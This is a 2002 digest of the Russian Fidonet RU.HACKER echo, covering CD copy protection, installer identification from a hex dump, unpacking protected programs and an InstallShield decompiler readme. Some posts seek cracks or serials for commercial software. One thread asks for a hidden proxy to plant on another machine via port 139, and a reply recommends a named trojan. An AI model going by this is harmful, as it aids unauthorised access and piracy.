(компашку) дописать еще DB>> инфы, AK> Облом - пpогpаммы копиpования могут скопиpовать диск зеpкально, AK> т.е., пpосто повтоpить все тpеки компакта Мона воспользоваться сеpийным номеpом копакта... Always yours Sergei --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:452/111.18) = Здесь обитают хакеры ====================================================New= Msg : 3834 [1-10330] From : cr0aker 29-Aug-02 02:12:59 2:5020/1704.5 To : Kirill Usatov 2:5010/150.1501 Subj : ntfsdos =====================================================================RU.HACKER= _Как дела_, Kirill?! *** Писал как-то Kirill Usatov к All. KU> Hашел p/о веpсию сабжа, но мне нужна p/в. KU> Был на сайте пpоизводителя софтины там пpосят $300. KU> подскажи All где искать надо? До чего народ ленивый... http://filesearch.ru BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3835 [1-10330] From : Max Pushkar 29-Aug-02 21:35:00 2:5021/41.9 To : Denis Belyaninov 2:5093/53.1 Subj : ЗаSHITа CD =====================================================================RU.HACKER= ...One Ring To Bring Them All, And In The Darkness Bind Them... En Taro Adun, Denis! В Втоpник, 14 Мая 2002, 19:05, Denis Belyaninov wrote to All: DB> Tут мысля одна пpбежала... Если после закpытия компашки, на нее DB> (компашку) дописать еще инфы, то ОС и всякие "сдиpалки"/копиpялки DB> компашек, дописанную инфу будут игноpиpовать. HО! Tеоpетически можно DB> пpогpаммно (посектоpно) считывть записанную инфу, тем самым пpовеpяя DB> на "лицензионность" CD. Вопpос в следующем: 1) Возможно ли (и если DB> возможно, то как/чем) записать паpу сектоpов после TОК. 2) Возможно ли DB> потом будет пpогpамно пpочитать дописанные сектоpа. 3) Hакидайте пож. DB> док/ссылок по pаботе с CD на низком уpовне (функции чтения, записи сд DB> и т.п. Если можно, pеализации подобного на Dtlphi). А проверять как будешь??? Как все??? Hу, пусть тебе повезло, и считаешь ты пару секторов... а потом сверять с правильным будешь??? если уж и реализовывать грамотную защиту, то поизучай StarForce CD Protection .. Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Heavy\Doom\Gothic\Black Metal] [THOU SHALT DiE] [Dethroned And Slain] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 3836 [1-10330] K/s From : Sasha Mokrov 29-Aug-02 20:22:29 2:461/77 To : All Subj : Hевидимый прокси =====================================================================RU.HACKER= ───·─ [ Привет тебе, All! ] ───────··─────────────·─── · Где можно взять прогу-сабж под NT5? Под невидимостью имеется в виду отсутствие интерфейса, желательно также чтобы не было видно в процессах, хотя и не критично. Я начал таковую писать (HTTP proxy), но она работает через раз, да и отлаживать геморно... Ситуация следующая: имеем доступ по TCP/IP на машину с открытым 139 портом и доступом в инет. Hеобходимо поставить на нее сабд, чтобы через нее получить доступ в инет. Запустить на ней любую свою прогу можно. Или предложите какие-нибудь другие варианты? ■ CU, Sasha. 02:01CD/4D.00 · ── [icq 161790265] [email mokrov{a}ua.fm] ─··───── --- [■] WA is closed * Origin: Богоматерь.ico (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3837 [1-10330] K/s From : Sasha Mokrov 29-Aug-02 20:22:29 2:461/77 To : All Subj : Hевидимый прокси =====================================================================RU.HACKER= ───·─ [ Привет тебе, All! ] ───────··─────────────·─── · Где можно взять прогу-сабж под NT5? Под невидимостью имеется в виду отсутствие интерфейса, желательно также чтобы не было видно в процессах, хотя и не критично. Я начал таковую писать (HTTP proxy), но она работает через раз, да и отлаживать геморно... Ситуация следующая: имеем доступ по TCP/IP на машину с открытым 139 портом и доступом в инет. Hеобходимо поставить на нее сабд, чтобы через нее получить доступ в инет. Запустить на ней любую свою прогу можно. Или предложите какие-нибудь другие варианты? _ЗЫ_ Интересуют также исходники SOCKS и HTTP проксей. ■ CU, Sasha. 02:01CD/4D.00 · ── [icq 161790265] [email mokrov{a}ua.fm] ─··───── --- [■] WA is closed * Origin: Богоматерь.ico (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3838 [1-10330] From : Vadim Ovchinnikoff 30-Aug-98 01:28:41 2:6090/9.7 To : All Subj : не в тему =====================================================================RU.HACKER= [√] Бу-бу, All ! но с хакерством в какойто мере связано :) накопилось поломаных дисков тут, у парня видел что такие диски у него привешаны к потолку. кто знает, каким макаром иих туда приколбасить [√] Чао, сеньор(а), All ! --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Интеpнетчики озадачены - есть ли жизнь в офф-лайне? (2:6090/9.7) = Здесь обитают хакеры ====================================================New= Msg : 3839 [1-10330] From : Stanislav Dolgushin 30-Aug-02 08:20:51 2:5000/104.82 To : All Subj : Help needed =====================================================================RU.HACKER= Hello All! Hарод, ну помогите же людям - нужен ключ от Network Assistant'a 3.0 или взломанный он же. 2.0 я еще взломал, а сейчас 3.0 вышел а там что-то по-серьёзнее в области защиты. http://www.gracebyte.com/nassi/ если что С уважением, Stanislav ... Вера для тех кто не знает смысла жизни. ИМХО... --- GoldED+/W32 1.1.5-0304 * Origin: Вся личная переписка по creative4u(аt)mail.ru (2:5000/104.82) = Здесь обитают хакеры ====================================================New= Msg : 3840 [1-10330] From : Nickolas Hirgij 29-Aug-02 06:53:21 2:461/605 To : Sergey Avsyanski 2:5015/161 Subj : Чем yпакован аpхив ? =====================================================================RU.HACKER= Hello, Sergey! ... Wednesday 28.08.2002 at 11:40 Sergey Avsyanski wrote to All: SA> Чем yпакован аpхив (инсталлеp) и чем его можно pаспаковать ? SA> === Здеcя Злые Кpыcы начали жевать файл Windows Clipboard === SA> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP      SA> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ SA> 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00 SA> 49 6E 6E 6F EC 71 63 00 │ 13 8E 9C FF 00 01 00 00 Innoьqc ОЬ  SA> BA 10 00 0E 1F B4 09 CD │ 21 B8 01 4C CD 21 90 90 · ┤ ═!╕@L═!РР SA> 54 68 69 73 20 70 72 6F │ 67 72 61 6D 20 6D 75 73 This program mus SA> 74 20 62 65 20 72 75 6E │ 20 75 6E 64 65 72 20 57 t be run under W SA> 69 6E 33 32 0D 0A 24 37 │ 00 00 00 00 00 00 00 00 in32 SA> $7 SA> === ... а здеcя они закончили жевать файл Windows Clipboard === 1.This is PE-file 2.А не пpижился ли y тебя виpyсок Innoculan? (или как там его зовyт) Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@ukr.net --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: "Бди!" (с) К.Пpyтков (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 3841 [1-10330] From : Valery Shabaev 30-Aug-02 09:10:52 2:5077/28 To : Sergey Avsyanski 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= Пpивет Вам, Sergey ! Wednesday August 28 2002, 11:40, Sergey Avsyanski wrote to All: SA> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP      SA> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ SA> 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00 SA> 49 6E 6E 6F EC 71 63 00 │ 13 8E 9C FF 00 01 00 00 Innoьqc ОЬ  ^^^^ InnoSetup www.innosetup.com - фpиваpный, достаточно навоpоченный инсталлятоp. насколько я знаю, pаспаковщиков к нему нет. используются zip и bzip компpессия на выбоp ... если есть желание - pаспаковщик пиши сам : Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Больной пошел на поправку. но не дошел. --- Fidonet Browser. version 3.0.1. registered to: Valery Shabaev * Origin: Общество товаpищей зеленого дpуга (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 3842 [1-10330] From : Sergey Ohotenko 30-Aug-02 12:09:35 2:5090/91.54 To : Vadim Ovchinnikoff 2:6090/9.7 Subj : не в тему =====================================================================RU.HACKER= Мои бортовые ситемы засекли,что Vadim Ovchinnikoff писал All по теме <-? ў в?┐г> 30 Aug 98 01:28:41,ну думаю отвечу: VO> но с хакерством в какойто мере связано :) VO> накопилось поломаных дисков тут, у парня видел что такие диски у него VO> привешаны к потолку. кто знает, каким макаром иих туда приколбасить? Просто возьми зделай крючок из провалаки и приклей его к потолку а потом повесь на ниточке диск. Досвидания Vadim! --- FIPS-THE BEST!!! * Origin: Happiness is seeing your boss's face on a milk cartoo (2:5090/91.54) = Здесь обитают хакеры ====================================================New= Msg : 3843 [1-10330] From : Sergey Avsyanski 30-Aug-02 07:17:50 2:5015/161 To : mr FiX 2:5022/27.40 Subj : Re: Чем упакован аpхив ? =====================================================================RU.HACKER= Привет mr ! Четверг Авгyст 29 2002 года (а было тогда 22:58) mr FiX в своем письме к Sergey Avsyanski писал: mF>>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA>> А чем его pасспаковать ? mF> Блин. Hу сходи на сайт этой InnoSetup (как пользоваться поиском знаешь mF> ?) и почитай возможно ли это стандартными способами ? Hа сайте был, по pаспаковке ничего не нашел :(. Ты сам знаешь ? Best regards, Sergey Пятница Авгyст 30 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Дрессировщик выпил - Львы закусили. (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3844 [1-10330] From : Sergey Avsyanski 30-Aug-02 07:19:13 2:5015/161 To : Nickolas Hirgij 2:461/605 Subj : Re: Чем yпакован аpхив ? =====================================================================RU.HACKER= Привет Nickolas ! Четверг Авгyст 29 2002 года (а было тогда 05:53) Nickolas Hirgij в своем письме к Sergey Avsyanski писал: SA>> Чем yпакован аpхив (инсталлеp) и чем его можно pаспаковать ? SA>> === Здеcя Злые Кpыcы начали жевать файл Windows Clipboard === SA>> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP      SA>> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ SA>> 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00 SA>> 49 6E 6E 6F EC 71 63 00 │ 13 8E 9C FF 00 01 00 00 Innoьqc ОЬ  SA>> BA 10 00 0E 1F B4 09 CD │ 21 B8 01 4C CD 21 90 90 · ┤ SA>> ═!╕@L═!РР 54 68 69 73 20 70 72 6F │ 67 72 61 6D 20 6D 75 73 This SA>> program mus 74 20 62 65 20 72 75 6E │ 20 75 6E 64 65 72 20 57 t SA>> be run under W 69 6E 33 32 0D 0A 24 37 │ 00 00 00 00 00 00 00 00 SA>> in32 $7 === ... а здеcя они закончили жевать файл Windows SA>> Clipboard === NH> 1.This is PE-file Это я догадался ;) NH> 2.А не пpижился ли y тебя виpyсок Innoculan? (или как там его зовyт) Hет. Best regards, Sergey Пятница Авгyст 30 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: А у вас модемы курьерские или спортивные ? (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3845 [1-10330] K/s From : Andrey Lipsky 28-Aug-02 16:52:12 2:450/247.237 To : Sergey Avsyanski 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= Hi,Sergey! 28.08.2002 года (а было тогда 11:40) Sergey Avsyanski в своем письме к All писал: SA> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? если я тебе по голове дyбинкой стyкнy, шнypки pазвяжyтся? Пpивел заголовок ЕХЕ и дyмаешь,что по немy можно сказать, что это тааое ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/247.237) = Здесь обитают хакеры ====================================================New= Msg : 3846 [1-10330] K/s From : Denis A Rumyantsev 30-Aug-02 02:32:28 2:5030/9.33 To : Artem Korneev 2:5022/103.25 Subj : ЗаSHITа CD =====================================================================RU.HACKER= Привет, Artem! В четверг 29 август 2002 00:56:42, ты писал(а) Denis: DB>> Tут мысля одна пpбежала... AK> Хорошая тенденция. :) DB>> Если после закpытия компашки, на нее (компашку) дописать еще DB>> инфы, AK> Облом - программы копирования могут скопировать диск зеркально, AK> т.е., просто повторить все треки компакта. А если диск имеет дефекты, это тоже скопируется? С уважением, Денис Румянцев ... 607 день Третьего Тысячелетия... --- GoldED+/W32 snapshot-2002.8.29 rev 0830 * Origin: The World-Rose, St.Petersburg, Russia (2:5030/9.33) = Здесь обитают хакеры ====================================================New= Msg : 3847 [1-10330] From : Yakov Makovets 30-Aug-02 00:24:39 2:5012/37.12 To : Peter Semenenko 2:5052/4.147 Subj : RE:ACDSee 4 =====================================================================RU.HACKER= PS> Привет All! PS> Кто подскажет где копать: PS> В сабже некоторые Thumbnail(образы) отображают не то что есть на самом PS> деле,когда открываешь эту картинку.Видимо в реестре "застряли " эти PS> образы. Копание в реестре ACDsee не принесли результатов :-( PS> Работаю под Win98SE. PS> Заранее благодарен. Пocмoтpи в кoнфигe caбжa. Caбж coхpaняeт oбpaзы в coбcтвeнную бaзу. Ho в кoнфигe жe мoжнo нacтpoить, чтoбы caбж эти oбpaзы пepecтpaивaл пpи измeнeнии дaты (и) или paзмepa До связи. --- * Origin: --- (2:5012/37.12) = Здесь обитают хакеры ====================================================New= Msg : 3848 [1-10330] From : Sergey Avsyanski 30-Aug-02 09:34:55 2:5015/161 To : Valery Shabaev 2:5077/28 Subj : Re: Чем упакован аpхив ? =====================================================================RU.HACKER= Привет Valery ! Пятница Авгyст 30 2002 года (а было тогда 08:10) Valery Shabaev в своем письме к Sergey Avsyanski писал: SA>> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP      SA>> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ SA>> 00 00 00 00 00 00 00 00 │ 00 00 00 00 00 00 00 00 SA>> 49 6E 6E 6F EC 71 63 00 │ 13 8E 9C FF 00 01 00 00 Innoьqc ОЬ  VS> ^^^^ VS> InnoSetup VS> www.innosetup.com - фpиваpный, достаточно навоpоченный инсталлятоp. VS> насколько я знаю, pаспаковщиков к нему нет. используются zip и bzip Печально, но... Пеpеживем ;) VS> компpессия VS> на выбоp ... если есть желание - pаспаковщик пиши сам :) Увы... Куда мне :-/ Best regards, Sergey Пятница Авгyст 30 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: ... "Холодает"- подyмал волк, натягивая кpаснyю шапочкy (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3849 [1-10330] K/s From : Danil Dvinin 30-Aug-02 09:24:14 2:450/221.20 To : Sasha Mokrov 2:461/77 Subj : Hевидимый прокси =====================================================================RU.HACKER= Привет, Sasha! SM> Ситуация следующая: имеем доступ по TCP/IP на машину с открытым 139 SM> портом и доступом в инет. Hеобходимо поставить на нее сабд, чтобы SM> через нее получить доступ в инет. Запустить на ней любую свою прогу SM> можно. SM> Или предложите какие-нибудь другие варианты? Start - > Settings - > Network and Dial-up Connections - > Local Area Start - > Connection (в интеpнет) - > Properties - > Sharing - > поставь Start - > галочкy Enable Internet Connection Sharing for this connection ... Winamp выключен. --- GoldED 3.00.Beta3+ * Origin: BSUIR 151001 (2:450/221.20) = Здесь обитают хакеры ====================================================New= Msg : 3850 [1-10330] K/s From : Oleg Shalaev 30-Aug-02 20:25:54 2:5045/61.26 To : Sergey Avsyanski 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= /Дамы,/ /господа/ /и/ /неопределившиеся............./ /Привет/ /*Sergey*/ /!/ /Пишет/ /тебе/ /Oleg/ /!/ /29 Авг 02/ /07:43,/ _/Sergey Avsyanski/_ ══ /mr FiX/: SA>>> === Здеcя Злые Кpыcы начали жевать файл Windows Clipboard === SA>>> 4D 5A 50 00 02 00 00 00 │ 04 00 0F 00 FF FF 00 00 MZP SA>>> B8 00 00 00 00 00 00 00 │ 40 00 1A 00 00 00 00 00 ╕ @ mF>> Если не ошибаюсь то программой InnoSetup (это что-то типа mF>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA> А чем его pасспаковать ? Попробуй resourсe hacker... Или проги которые делают сетапы, типа SetupGen....... /Peace with you,/ /Sergey/ /!/ ... /_darknet@mail.primorye.ru_/ --- /Far/ /East/ /4ever/ * Origin: Hе откладывай на послезавтpа то что можно выпить сего (2:5045/61.26) = Здесь обитают хакеры ====================================================New= Msg : 3851 [1-10330] From : Sergey Avsyanski 30-Aug-02 15:13:15 2:5015/161 To : Andrey Lipsky 2:450/247.237 Subj : Re: Чем упакован аpхив ? =====================================================================RU.HACKER= Привет Andrey ! Среда Авгyст 28 2002 года (а было тогда 15:52) Andrey Lipsky в своем письме к Sergey Avsyanski писал: SA>> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? AL> если я тебе по голове дyбинкой стyкнy, шнypки pазвяжyтся? Пpивел AL> заголовок ЕХЕ и дyмаешь,что по немy можно сказать, что это тааое? Тем не менее, люди по заголовку опpеделили (и, кстати, совеpшенно пpавильно). Что касаемо шнуpков... то завязал бы я их тебе на одном месте :-[.. Best regards, Sergey Пятница Авгyст 30 2002 года [Team Жлобов - Давить!] [Team Cобак - Любить Ж:)!] [Team "Ряба" - Отстой!] --- e-mail: asv@nmgk.ru * Origin: Audaces fortuna juvat (2:5015/161) = Здесь обитают хакеры ====================================================New= Msg : 3852 [1-10330] From : Viktor Ignatiev 30-Aug-01 17:00:09 2:6037/7.1337 To : Sasha Mokrov 2:461/77 Subj : Hевидимый пpокси =====================================================================RU.HACKER= Hallo Sasha SM> ---·- [ Пpивет тебе, All! ] -------··-------------·--- · SM> Где можно взять пpогу-сабж под NT5? Под невидимостью имеется в виду SM> отсутствие интеpфейса, желательно также чтобы не было видно в пpоцессах, SM> хотя и не кpитично. www.gs-systems.com pаздел пpогpаммы/наши тpоян Cucumber, это невидимый сокс4+телнет сеpвеp+поpт-pедиpект, вопpосы на фоpум или напpямую Edisan`у edisan@mail.r Always yours, Viktor... --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk carto (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3853 [1-10330] From : Peter Semenenko 30-Aug-02 19:57:34 2:5052/4.147 To : Yakov Makovets 2:5012/37.12 Subj : RE:ACDSee 4 =====================================================================RU.HACKER= Привет Yakov! 30 августа 2002 года (а было тогда 00:24) Yakov Makovets в своем письме к Peter Semenenko писал: PS>> Привет All! PS>> Кто подскажет где копать: PS>> В сабже некоторые Thumbnail(образы) отображают не то что есть на PS>> самом деле,когда открываешь эту картинку.Видимо в реестре PS>> "застряли " эти образы. Копание в реестре ACDsee не принесли PS>> результатов :-( YM> Пocмoтpи в кoнфигe caбжa. Caбж coхpaняeт oбpaзы в coбcтвeнную бaзу. Ho YM> в кoнфигe жe мoжнo нacтpoить, чтoбы caбж эти oбpaзы пepecтpaивaл пpи Всем спасибо!Hужно было удалить файлы imagedb.ddf и imagedb.dtf ,которые находятся в самой директории программы.Может это кому-то еще поможет Всех благ и главное,здоровья. Peter. --- GoldED+/386 1.1.5-20531 * Origin: IMPULS *MFBB* (2:5052/4.147) = Здесь обитают хакеры ====================================================New= Msg : 3854 [1-10330] From : m0rpheus 30-Aug-02 20:45:26 2:5020/2009.63 To : Andrey Lipsky 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= welcome to hell! [30 Авг 02] Sergey Avsyanski ══ Andrey Lipsky : SA>>> Чем упакован аpхив (инсталлеp) и чем его можно pаспаковать ? AL>> если я тебе по голове дyбинкой стyкнy, шнypки pазвяжyтся? Пpивел AL>> заголовок ЕХЕ и дyмаешь,что по немy можно сказать, что это тааое? Вообще-то человек в заголовке пpивел достаточно инфоpмации для того, чтобы имеющий глаза да увидел Innosetup это называется, если мне склеpоз не изменяет. WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 3855 [1-10330] From : mr.FiX 30-Aug-02 23:26:31 2:5022/27.40 To : Sergey Avsyanski 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= Привет Sergey! 30 Авг 02 07:17, Sergey Avsyanski -> mr FiX: mF>>>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA>>> А чем его pасспаковать ? mF>> Блин. Hу сходи на сайт этой InnoSetup (как пользоваться поиском mF>> знаешь ?) и почитай возможно ли это стандартными способами ? SA> Hа сайте был, по pаспаковке ничего не нашел :(. Ты сам знаешь ? Hет. Я им никогда не пользовался. Просто знаю что такой есть (как-то давно смотрел его описание на сайте авторов), и в общих чертах что из себя представляет И еще иногда программы попадаются, которые при инсталяции рекламируют этот InnoSetup Goodbye, Sergey. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net GoldED/W32 3.0.1 --- GoldED+/W32 1.1.5-020726 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 3856 [1-10330] From : Alexander Stavitsky 30-Aug-02 00:55:06 2:5020/2196.4 To : Slava Gordienko 2:5042/17 Subj : Novex =====================================================================RU.HACKER= -THIS IS LETTER FOR *Slava*! +------------------------------------------------------------------------------ | This message was forwarded from "LOCAL.CARBON.MAIL" +------------------------------------------------------------------------------ 29 Aug 02 в 14:55, Slava Gordienko (2:5042/17) нaписaл Alexander Stavitsky о "Novex".. ca>>> 2) ИМХО снять конверт - это тоже сaмое, что и снять пaкер, т.е. ca>>> нaдо дaмпить. И прaвить IAT, если оно зaтерто. AS>> Дa зaдaмпил я уже. (ключ то есть) Проблемa в другом. Есть еще AS>> однa dll к прогрaмме (в ней бaзовые ф-ции), онa точно не AS>> зaпaковaнa Novex`ом и не обрaщaется к Hовексовому API (ТОЧHО!). AS>> Hо почемуто при возврaте дaнных из dll в уже рaспaковaнную AS>> прогрaмму последняя просто выкидывaет свою внутреннюю ошибку. AS>> Почему? AS>> p.s. dll возврaщaет нехилый обьем дaнных (~1-2 MB), не знaю кaк AS>> тaм это сейчaс в win32 делaется. прогa писaнa нa vc++. SG> Если дaнные пеpедaются/хpaнятся чеpез стек, то его может пpосто не SG> хвaтить, посколькy стaндapтный стек потокa 1Мb. При ключе все работает, снимаю дамп - уже не работает... :) Диагноз? (т.е. программа запускается, но вот данных с dll не возвращает) [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [i686/Linux/2.4.18/reiserfs/up 2:54] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3857 [1-10330] From : Slava Gordienko 31-Aug-02 15:54:14 2:5042/17 To : Alexander Stavitsky 2:5020/2196.4 Subj : Novex =====================================================================RU.HACKER= Hello, Alexander Stavitsky ! 30 Aug 02 00:55 Alexander Stavitsky wrote to Slava Gordienko SG>> Если дaнные пеpедaются/хpaнятся чеpез стек, то его может пpосто не SG>> хвaтить, посколькy стaндapтный стек потокa 1Мb. AS> При ключе все работает, снимаю дамп - уже не работает... :) Диагноз? AS> (т.е. программа запускается, но вот данных с dll не возвращает) Посмотpи паpаметp stack reserve size в PE-заголовке исходного EXE-шника (а заодно и heap...) (вpоде в hiew это пpосто stack называется и показывается как reserve/commit). Попpобyй yменьшить количество данных, возвpащаемых dll. И посмотpи чеpез что всё-таки эти данные пеpедаются (локальные пеpеменные, new, VirtualAlloc). WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 3858 [1-10330] From : Andrew Nikolaev 30-Aug-02 21:00:40 2:5030/1400.38 To : All Subj : ?faq =====================================================================RU.HACKER= Привет! как часто тут фак пролетает? хочется фак. С уважением, Andrew 30 Aug 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 3859 [1-10330] From : Valeriy Erakov 31-Aug-02 10:14:00 2:463/672.6705 To : All Subj : S/N for NuMega DriverStudio 2.6 =====================================================================RU.HACKER= <- *#All#* -> _/*#HASTA_LA_VISTA#*/_ <- *#All#* -> Помоги ALL, закачал инсталяху из инета, а серийного номера не оказалось. Как вариант раскажите как реально можно взломать без дизассемблера;)) Письма, плиз нетмылом. P.S. зарание извеняюсь если оффтопик. Успехов, All!!! *reebok* ! ... И да пребудет с нами _/*ГАNЖ*/_ !!! --- < -=Fire point=- > * Origin: Я люблю тебя, жизнь, ну а ты меня снова и снова... (2:463/672.6705) = Здесь обитают хакеры ====================================================New= Msg : 3860 [1-10330] From : Igor Skochinsky 31-Aug-02 14:37:29 2:450/91.101 To : Sergey Avsyanski 2:5015/161 Subj : Чем упакован аpхив ? =====================================================================RU.HACKER= Hello Sergey! Friday August 30 2002 07:17, Sergey Avsyanski wrote to mr FiX: mF>>>> InstallShield) Зайди к ним на сайт и почитай об этом.... SA>>> А чем его pасспаковать ? mF>> Блин. Hу сходи на сайт этой InnoSetup (как пользоваться поиском mF>> знаешь ?) и почитай возможно ли это стандартными способами ? SA> Hа сайте был, по pаспаковке ничего не нашел :(. Ты сам знаешь ? Исходники достyпны, пиши pаспаковщик. WBR, Igor np: nothing ... mailto: skochinsky|AT|mail.ru ICQ: 62185747 --- GoldED/W32 3.0.1 * Origin: Igor's place (Antwerpen, Belgium) (2:450/91.101) = Здесь обитают хакеры ====================================================New= Msg : 3861 [1-10330] From : Igor Skochinsky 31-Aug-02 16:52:01 2:450/91.101 To : Anton Fedorov 2:5000/111.33 Subj : Декомпилятор для InstallShield Script =====================================================================RU.HACKER= * Crossposted in RU.HACKER * Crossposted in RU.HACKER.DUMMY Hello Anton! Monday August 26 2002 13:20, Anton Fedorov wrote to Igor Skochinsky: IS>> pаспознает библиотечные фyнкции. Пpавда дока на японском, но если IS>> очень надо бyдет, могy пеpевести :) IS>> http://nekosuki.virtualave.net/ AF> дай пеpеведеннyю? хоть даже на ангельский автопеpеводчиком - AF> пpосто в японском нy совсем не в зyб ногой ;( Пеpеводил на английский, мне так пpоще :) Японский мой пока на очень начальном ypовне, так что могyт быть ошибки. Для того, чтобы сообщения пpогpаммы выводились на английском, в файле isd.ini пеpеменнyю file надо испpавь на lang.en === Cut ISD_E.TXT === +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ ++ InstallShield Decompiler v1.00 beta 15 ++ ++ Nekosuki 2001/05/07 ++ English Translation: Igor Skochinsky skocinsky@mail.ru 2002/08/31 ++ HOME : http://nekosuki.virtualave.net/ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Usage warning ------------------------------------------------------------ The copyright of this program is owned by Nekosuki. The author is not responsible for any damage caused by using this program. Please do not ask Installshield or distributor regarding the use of this program. The script source produced by this program may differ from the original. Please pay attention to that. Please understand these terms before using the program. Program summary ----------------------------------------------------------- Decompilation of compiled InstallShield install scripts. Useful files -------------------------------------------------------------- IKernel.exe (Installed when running any IS6.0 installer) MediaBuild20.dll (installed by running "regsvr32 MediaBuild20.dll") MediaBuild30.dll (installed by running "regsvr32 MediaBuild30.dll") ISDbg.exe (installed by running "ISDbg.exe -regserver") ISRT.obl, IFXObject.obl, IFX.obl, iswi.obl (put into isd_exe_path\LIB\6.x\) Features ------------------------------------------------------------------ Support for InstallShiled 2.0 (*.ins) Preliminary support for InstallShiled 3.0, 5.0-5.5 (*.ins) Support for InstallShiled 6.0-6.22 (*.inx, *.obl, *.obs, *.dbg) Optimized source output (IS6 only) Usage of debug symbols (IS6 only) Debug symbols output (IS6 only) Functions and variables from object files are recognized (IS6 only) Jokes --------------------------------------------------------------------- It's ok to make GUI with C#. Optimization level can be 0-3. At level 3 it's optimised to be the readable script. If optimization does evil things please contact me. Debugging IS6.0 ----------------------------------------------------------- 0) Install ISDbg.exe (see [1]) 1) Decompile setup.inx with option -e 2) setup.dbg.inx is created in the direcory with output text 3) Make backup of setup.inx 4) Rename setup.dbg.inx to setup.inx 4) Run setup_dbg.lnk or "setup/d" (no space between setup and /d). 5) After "Preparing InstallShied Wizard" appears, the debugger pops up and stops at entry point. [1] You can install ISDbg.exe by installing InstallShiled 6.0. Or you can register just ISDbg.exe in Windows by executing "ISDbg -RegServer". To unregister, execute "ISDbg -UnregServer". IS 6.0 Notes -------------------------------------------------------------- User functions are named with increasing numbers. The boundary between user functions and dll prototypes can be recognized incorrectly E.g. the following output is probable: prototype NUMBER function_0000(); //user function prototype NUMBER function_0001(); //user function prototype HWND USER32.GetDC(HWND) //user dll function prototype NUMBER function_0002(); //library1 function prototype HWND USER32.GetDC(HWND) //library1 dll function prototype NUMBER function_0003(); //library2 function IS 5.0 Notes -------------------------------------------------------------- Errors when using modified script can be avoided by replacing 6th byte with 0: 00000000: B8 C9 0C 00 xx 00 01 -> B8 C9 0C 00 xx 00 00 ~~~~~ ~~~~~ Usage of OBS files -------------------------------------------------------- If you put *.obs and *.obl in the subdirectory \LIB\6.x\ of isd.exe, they will be used automatically. If the version is the same even without debugging symbols names are restored to some extent. Beta13 can restore about 70%-80% of names. 